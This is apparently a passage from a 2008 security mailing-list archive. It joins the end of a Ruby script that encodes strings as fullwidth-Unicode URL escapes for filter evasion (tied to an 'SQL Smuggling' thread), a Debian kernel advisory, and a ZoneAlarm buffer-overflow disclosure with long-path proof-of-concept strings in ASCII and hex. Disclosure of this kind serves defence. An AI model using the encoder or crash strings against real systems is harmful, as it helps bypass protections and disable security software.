'=' = '%uff1d',
'a' = '%uff41',
'A' = '%uff21',
'b' = '%uff42',
'B' = '%uff22',
'c' = '%uff43',
'C' = '%uff23',
'd' = '%uff44',
'D' = '%uff24',
'e' = '%uff45',
'E' = '%uff25',
'f' = '%uff46',
'F' = '%uff26',
'g' = '%uff47',
'G' = '%uff27',
'h' = '%uff48',
'H' = '%uff28',
'i' = '%uff49',
'I' = '%uff29',
'j' = '%uff4a',
'J' = '%uff2a',
'k' = '%uff4b',
'K' = '%uff2b',
'l' = '%uff4c',
'L' = '%uff2c',
'm' = '%uff4d',
'M' = '%uff2d',
'n' = '%uff4e',
'N' = '%uff2e',
'o' = '%uff4f',
'O' = '%uff2f',
'p' = '%uff50',
'P' = '%uff30',
'q' = '%uff51',
'Q' = '%uff31',
'r' = '%uff52',
'R' = '%uff32',
's' = '%uff53',
'S' = '%uff33',
't' = '%uff54',
'T' = '%uff34',
'u' = '%uff55',
'U' = '%uff35',
'v' = '%uff56',
'V' = '%uff36',
'w' = '%uff57',
'W' = '%uff37',
'x' = '%uff58',
'X' = '%uff38',
'y' = '%uff59',
'Y' = '%uff39',
'z' = '%uff5a',
'Z' = '%uff3a',
'0' = '%uff10',
'1' = '%uff11',
'2' = '%uff12',
'3' = '%uff13',
'4' = '%uff14',
'5' = '%uff15',
'6' = '%uff16',
'7' = '%uff17',
'8' = '%uff18',
'9' = '%uff19'}

  # Convert string to array of chars
  chararray = string.scan(/./)
  newstr = String.new
  chararray.each do |c|
  if lookuptable.has_key? c
  newstr = newstr + lookuptable[c]
  else
  newstr = newstr + URI.escape(c)
  end
  end

  return newstr
end

print Enter string to URL Unicode:
puts unicode_url(gets)











From: Tim [EMAIL PROTECTED]
Sent: 10 September 2008 00:34
To: [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com
Subject: Re: SQL Smuggling

 We released a research paper a few months ago, regarding a sub-class
 of SQL Injection that has not received attention till now. The crux is
 that when it comes to SQLi, protection and detection do not typically
 take the architecture into account; this can allow smuggling attacks
 which are not blocked or discovered.

 The paper can be found at:
 http://www.ComsecGlobal.com/framework/Upload/SQL_Smuggling.pdf

 From the paper:
 This paper will present a new class of attack, called SQL Smuggling.
 ...


I don't see how this is a new class of attack.  You've merely outlined
some techniques to bypass broken data validation routines.  In SQL
injection, as with any injection vulnerability, the correct way to fix
it is to rely on the syntax of the language to encode data which may be
interpreted 

[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities

2008-09-11 Thread dann frazier
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1636-1[EMAIL PROTECTED]
http://www.debian.org/security/   dann frazier
Sep 11, 2008http://www.debian.org/security/faq
- --

Package: linux-2.6.24
Vulnerability  : denial of service/information leak
Problem type   : local/remote
Debian-specific: no
CVE Id(s)  : CVE-2008-3272 CVE-2008-3275 CVE-2008-3276 CVE-2008-3526
 CVE-2008-3534 CVE-2008-3535 CVE-2008-3792 CVE-2008-3915

Several vulnerabilities have been discovered in the Linux kernel that may
lead to a denial of service or leak sensitive data. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-3272

Tobias Klein reported a locally exploitable data leak in the
snd_seq_oss_synth_make_info() function. This may allow local users
to gain access to sensitive information.

CVE-2008-3275

Zoltan Sogor discovered a coding error in the VFS that allows local users
to exploit a kernel memory leak resulting in a denial of service.

CVE-2008-3276

Eugene Teo reported an integer overflow in the DCCP subsystem that
may allow remote attackers to cause a denial of service in the form
of a kernel panic.

CVE-2008-3526

Eugene Teo reported a missing bounds check in the SCTP subsystem.
By exploiting an integer overflow in the SCTP_AUTH_KEY handling code,
remote attackers may be able to cause a denial of service in the form
of a kernel panic.

CVE-2008-3534

Kel Modderman reported an issue in the tmpfs filesystem that allows
local users to crash a system by triggering a kernel BUG() assertion.

CVE-2008-3535

Alexey Dobriyan discovered an off-by-one-error in the iov_iter_advance
function which can be exploited by local users to crash a system,
resulting in a denial of service.

CVE-2008-3792

Vlad Yasevich reported several NULL pointer reference conditions in
the SCTP subsystem that can be triggered by entering sctp-auth codepaths
when the AUTH feature is inactive. This may allow attackers to cause
a denial of service condition via a system panic.

CVE-2008-3915

Johann Dahm and David Richter reported and issue in the nfsd subsystem
that may allow remote attackers to cause a denial of service via a
buffer overflow.

For the stable distribution (etch), these problems have been fixed in
version 2.6.24-6~etchnhalf.5.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.5.dsc
Size/MD5 checksum: 5107 77e0185b5d5efa18885eae513acffa6a
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.5.diff.gz
Size/MD5 checksum:  3932827 40cb2fb2852c48b6da11ef1e0c59a8fa
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz
Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.5_all.deb
Size/MD5 checksum:81100 0382c2c77051367e8efd9d3d933f85ef
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.5_all.deb
Size/MD5 checksum:  4259616 a87291ee36a46fc9c5c040f83afa7f9f
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.5_all.deb
Size/MD5 checksum: 46858178 d62d102e8478bb14caa6d0303c68ff6b
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.5_all.deb
Size/MD5 checksum:   749438 9312478438ae81439074ceec72d3a349
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.5_all.deb
Size/MD5 checksum:  1548872 1a56b95a09b2caf8e6347578755d5ba6
  
http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.5_all.deb
Size/MD5 checksum:95464 9950e248bbe489b6fb60e3e9af1c

alpha architecture (DEC Alpha)

  

ZoneAlarm Security Suite buffer overflow

2008-09-11 Thread jplopezy

Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
--
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
--
Description

The zonealarm is a known firewall,
which in the version security suite brings some tools as an antivirus, 
antispam and so on.


Details of the version

ZoneAlarm Security Suite versión:7.0.483.000
Versión de TrueVector:7.0.483.000
Versión del controlador:7.0.483.000
Versión de motor anti-virus:3
Versión de motor antivirus:5.0.1.85
Versión de archivo DAT de firma de anti-virus 915051681
Versión de motor de protección contra programas espía:5.0.189.0
Versión de archivo DAT de firma de protección contra programas espía 
01.200801.3195
Versión de AntiSpam 5.0.6.8903


--
Vulnerability

The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.

The flaw could be exploited by malware to leave without protection to the 
system for instance.

--
POC/EXPLOIT


Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf


Strings


ASCII: · …  AAA · …  AAA · …  
AAA · · …  AAA · …  AAA · …  
AAA · · …  A · …  AAA · …  AAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 
b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 
20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 
b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 
20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 
b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41


ASCII: ………
AAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 
85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41




--
Juan Pablo Lopez Yacubian